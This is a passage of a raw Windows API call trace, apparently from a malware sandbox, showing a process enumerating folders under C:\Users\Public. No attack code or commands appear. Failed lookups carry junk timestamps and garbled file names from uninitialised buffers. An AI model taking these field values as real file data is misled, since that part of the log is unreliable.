lstrlenW (lpString="desktop.ini") returned 11 [0068.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x5dffb0, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x7c0469b3, ftLastAccessTime.dwLowDateTime=0x101591b3, ftLastAccessTime.dwHighDateTime=0x9d0939db, ftLastWriteTime.dwLowDateTime=0x2cd2fc62, ftLastWriteTime.dwHighDateTime=0x9e0a92e1, nFileSizeHigh=0xad8009d6, nFileSizeLow=0xde98c212, dwReserved0=0xc62a26b2, dwReserved1=0xdb8ca60c, cFileName="熙?䉙Ბ轥礃掯⑻ꦥ﫶쑬틳﫹랁︲뚽騪Ꮚᒮᨾ飒݆ࣚ⬂歪㌻儲?ۆ鮩\x97昺罁鹿黼蕲쬊轘ᴔⲿ溿?ᇭ먥敎ᮄ跞鼪ঐ莦ᜠꀧ䶭⠥ㅷᄦꂯ骯率焀낮봂鶀䚻鐬ౕࣷ뢴୎骶恓㑿ᨬ勆猜龻ﮓ裴ᔭ捭痧嗿ㄶ㪾憎塚鏵?쭹뗚武戆⤜衵᛼捕ꆔ還艉龙嗧᜖⇛箅ⅺ㮓䒤䭴?ꨱ熄엟婌辧胘쫹㷽及ᨔ鄠劁빗ꯆ䆚ૌ눢껌㏙簹幡蒌ᄑ램㒿⨶馻많?쨒쉳લऋ쏁┓湘秚⫙䴀ꋀ蝯匓Šΐ㦶砛䁻煶ᆄ夻b潀澦紴咍䔎ꢿퟘ壷왟⧣⿡⤨碳奘?퉘佮ᛲ䜺㮊欭赩堉ν쎡裩䰍?䆦绫㤿믇堗嚍戌㐼댱糖껢?컵່遆죥?䅴仩윢炮馌鹊吋鵖㜪躱틁쑣飁⇵ꄗ픆ᄁൗ㴥⦃먋쐜妾煥఺ネ?蜵譝ᕠ妢챭蚁Ź爍搯ޯ⃩쨭繱孛怜≠矫궊퀂ዊꝣ횜⸁", cAlternateFileName="搯ޯ⃩쨭繱孛怜≠矫궊퀂ዊꝣ횜⸁")) returned 0xffffffff [0068.648] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.648] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0068.648] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.649] lstrlenW (lpString="My Pictures") returned 11 [0068.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x5dffb0, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x7c0469b3, ftLastAccessTime.dwLowDateTime=0x101591b3, ftLastAccessTime.dwHighDateTime=0x9d0939db, ftLastWriteTime.dwLowDateTime=0x2cd2fc62, ftLastWriteTime.dwHighDateTime=0x9e0a92e1, nFileSizeHigh=0xad8009d6, nFileSizeLow=0xde98c212, dwReserved0=0xc62a26b2, dwReserved1=0xdb8ca60c, cFileName="熙?䉙Ბ轥礃掯⑻ꦥ﫶쑬틳﫹랁︲뚽騪Ꮚᒮᨾ飒݆ࣚ⬂歪㌻儲?ۆ鮩\x97昺罁鹿黼蕲쬊轘ᴔⲿ溿?ᇭ먥敎ᮄ跞鼪ঐ莦ᜠꀧ䶭⠥ㅷᄦꂯ骯率焀낮봂鶀䚻鐬ౕࣷ뢴୎骶恓㑿ᨬ勆猜龻ﮓ裴ᔭ捭痧嗿ㄶ㪾憎塚鏵?쭹뗚武戆⤜衵᛼捕ꆔ還艉龙嗧᜖⇛箅ⅺ㮓䒤䭴?ꨱ熄엟婌辧胘쫹㷽及ᨔ鄠劁빗ꯆ䆚ૌ눢껌㏙簹幡蒌ᄑ램㒿⨶馻많?쨒쉳લऋ쏁┓湘秚⫙䴀ꋀ蝯匓Šΐ㦶砛䁻煶ᆄ夻b潀澦紴咍䔎ꢿퟘ壷왟⧣⿡⤨碳奘?퉘佮ᛲ䜺㮊欭赩堉ν쎡裩䰍?䆦绫㤿믇堗嚍戌㐼댱糖껢?컵່遆죥?䅴仩윢炮馌鹊吋鵖㜪躱틁쑣飁⇵ꄗ픆ᄁൗ㴥⦃먋쐜妾煥఺ネ?蜵譝ᕠ妢챭蚁Ź爍搯ޯ⃩쨭繱孛怜≠矫궊퀂ዊꝣ횜⸁", cAlternateFileName="搯ޯ⃩쨭繱孛怜≠矫궊퀂ዊꝣ횜⸁")) returned 0xffffffff [0068.649] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.649] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0068.649] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.649] lstrlenW (lpString="My Videos") returned 9 [0068.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x5dffb0, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x7c0469b3, ftLastAccessTime.dwLowDateTime=0x101591b3, ftLastAccessTime.dwHighDateTime=0x9d0939db, ftLastWriteTime.dwLowDateTime=0x2cd2fc62, ftLastWriteTime.dwHighDateTime=0x9e0a92e1, nFileSizeHigh=0xad8009d6, nFileSizeLow=0xde98c212, dwReserved0=0xc62a26b2, dwReserved1=0xdb8ca60c, cFileName="熙?䉙Ბ轥礃掯⑻ꦥ﫶쑬틳﫹랁︲뚽騪Ꮚᒮᨾ飒݆ࣚ⬂歪㌻儲?ۆ鮩\x97昺罁鹿黼蕲쬊轘ᴔⲿ溿?ᇭ먥敎ᮄ跞鼪ঐ莦ᜠꀧ䶭⠥ㅷᄦꂯ骯率焀낮봂鶀䚻鐬ౕࣷ뢴୎骶恓㑿ᨬ勆猜龻ﮓ裴ᔭ捭痧嗿ㄶ㪾憎塚鏵?쭹뗚武戆⤜衵᛼捕ꆔ還艉龙嗧᜖⇛箅ⅺ㮓䒤䭴?ꨱ熄엟婌辧胘쫹㷽及ᨔ鄠劁빗ꯆ䆚ૌ눢껌㏙簹幡蒌ᄑ램㒿⨶馻많?쨒쉳લऋ쏁┓湘秚⫙䴀ꋀ蝯匓Šΐ㦶砛䁻煶ᆄ夻b潀澦紴咍䔎ꢿퟘ壷왟⧣⿡⤨碳奘?퉘佮ᛲ䜺㮊欭赩堉ν쎡裩䰍?䆦绫㤿믇堗嚍戌㐼댱糖껢?컵່遆죥?䅴仩윢炮馌鹊吋鵖㜪躱틁쑣飁⇵ꄗ픆ᄁൗ㴥⦃먋쐜妾煥఺ネ?蜵譝ᕠ妢챭蚁Ź爍搯ޯ⃩쨭繱孛怜≠矫궊퀂ዊꝣ횜⸁", cAlternateFileName="搯ޯ⃩쨭繱孛怜≠矫궊퀂ዊꝣ횜⸁")) returned 0xffffffff [0068.649] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.649] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0068.649] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.649] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.649] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0068.649] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.649] lstrlenW (lpString="Downloads") returned 9 [0068.650] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.650] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.650] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.650] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.650] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.650] lstrlenW (lpString="desktop.ini") returned 11 [0068.650] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.650] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.650] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0068.651] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.651] lstrlenW (lpString="Favorites") returned 9 [0068.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.651] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.651] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.651] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0068.651] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.651] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.651] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0068.651] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.652] lstrlenW (lpString="Libraries") returned 9 [0068.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.652] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.652] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.652] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.652] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.652] lstrlenW (lpString="desktop.ini") returned 11 [0068.652] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.653] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Music", cAlternateFileName="")) returned 1 [0068.653] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.653] lstrlenW (lpString="Music") returned 5 [0068.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.653] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.653] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.653] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.653] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.653] lstrlenW (lpString="desktop.ini") returned 11 [0068.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc62a26b2, dwReserved1=0xdb8ca60c, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.731] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc62a26b2, dwReserved1=0xdb8ca60c, cFileName="..", cAlternateFileName="")) returned 1 [0068.731] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.731] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5dc070 | out: lpFindFileData=0x5dc070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0xc62a26b2, dwReserved1=0xdb8ca60c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.731] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.731] lstrlenW (lpString="desktop.ini") returned 11 [0068.731] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.732] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.732] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0068.732] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.732] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.732] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Pictures", cAlternateFileName="")) returned 1 [0068.732] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.732] lstrlenW (lpString="Pictures") returned 8 [0068.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.732] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.732] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.732] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.732] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.732] lstrlenW (lpString="desktop.ini") returned 11 [0068.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.814] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.814] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.814] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0068.814] 